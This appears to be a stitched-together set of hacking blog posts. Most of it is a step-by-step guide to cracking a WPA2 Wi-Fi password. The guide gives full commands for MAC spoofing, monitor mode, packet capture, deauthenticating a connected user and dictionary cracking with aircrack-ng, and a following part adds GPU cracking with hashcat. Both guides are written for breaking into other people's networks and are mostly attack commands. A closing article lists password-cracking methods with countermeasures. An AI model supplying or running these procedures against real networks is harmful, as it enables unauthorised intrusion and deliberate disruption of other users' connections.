How do I hack WPA2 Wi-Fi password using Backtrack 2016 ?

Backtrack is now Kali Linux download it when you get some free time.

Pre-Requisites:

1. Kali / back track Linux which will by default have all the tools required to dow what you want.
2. A Virtual Machine or a Laptop you can use to boot the BT or Kali
3. A compatible network card, The network card should support packet injection if you want to do it fast else you will have to wait some time for someone disconnect and connect back to the access point.

Important Phrases To Know:


MAC Address(Media Access Control Address) is a unique  identifier assigned to network interfaces for communications on the  physical network segment.

WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi

BSSID(Basic Service Set Identification) is the MAC address of the WAP

ESSID(Extended Service Set Identification) is the display name of the wireless network

WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access  II) are two security protocols and security certification programs  developed by the Wi-Fi Alliance to secure wireless computer networks.

PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.


STEP 1: Changing Your MAC Address :

1. In Kali/BT open the terminal.
2. command : ifconfig
3. This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
4. Turn off your network card using the command : ifconfig wlan0 down
   Note: change wlan0 to what ever it said in previous command.
5. command : macchanger -m 00:11:22:33:44:55
   This will change your MAC address of your device temporarily
6. Turn the device back on : ifconfig wlan0 up

STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.

1. Command : airmon-ng start wlan0
2. This will create a new monitor interface called mon0

STEP 3 : Start the attack by monitoring the wireless traffic 

1. Command : airodump-ng mon0
   this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs.
2. Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
3. Hit Ctrl+c to end the monitoring.

STEP 4: Lock onto the needed AP. 
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.

What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.

1. Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilename mon0
   The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting.
2. This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.

STEP 5 :  Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.

1. Open new terminal and give command :
   aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
   This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
2. If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
3. Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
   Hit ctrl+c and exit it. Time to crack the password.

STEP 6: Cracking the password

1. You need a password list file which can be downloaded from the internet. Just search for "wordlist" or  "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
2. Get and extract the word list file to your home folder.
3. Run the command :
   aircrack-ng -w wordlist.lst -b <AP BSSID>  dumpfilename*.cap
4. Replace the underlined with the the right details.

STEP 7: Wait

1. Wait some time as your computer does the dirty work of cracking the password. You should have the password on your screen soon.

Happy exploits.

Cracking a WPA Capture with the GPU using HashCat Part 7 - Backtrack

Introduction To Kali and WiFi Pen Testing

How to Install Kali Linux

WEP Hacking

Kali Linux and Reaver

Getting a Handshake and a Data Capture, WPA Dictionary Attack

Using Aircrack and a Dictionary to Crack a WPA Data Capture

Cracking a WPA Capture with the GPU using HashCat

Creating a Dictionary / Wordlist with Crunch Part 8

After a WPA/WPA 2 Handshake Capture has been saved to a drive cracking it with current computers can be challenging. To speed this process up the GPU in some video cards can be utilized.

This can speed things up drastically when doing a brute force crack on a WPA data capture.

You will need to know the video card you are currently using and Google it to see if it is compatible.

In the instructions before this aircrack-ng was used to show how to crack a WPA capture with a dictionary.

 In this example a tool called oclHashCat will be used in order to utilize a video cards GPU.

A dictionary file and the data capture are still needed only we will be using the video cards GPU to speed up the process. Always check to see if your card is compatible and the correct drivers are loaded.

Nvidia and AMD/ATI Video cards use two separate hashcat names.

The two main versions of HashCat are:
oclHashCat for AMD/ATI graphics cards
cudaHashCat for Nvidia graphics cards

You can download both from here http://hashcat.net/files/oclHashcat-plus-0.14.7z

Extract it with 7z x oclHashcat-plus-0.14.7z (Don’t use 7x e as it will not preserve the directory structure.)

To use hashcat the .cap file needs to be converted to ahccap file to do this use air-crack-ng.

aircrack-ng (out.cap) -J (out.hccap)

Run hashcat against your new capture file using the correct version.

cudaHashcat-plus32.bin -m 2500 (filename).hccap (wordlist)

NEXT     :   Creating a Dictionary / Wordlist with Crunch Part 8

6 Most Common Password Cracking Methods And Their Countermeasures- Hacking

There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.

Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing

Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.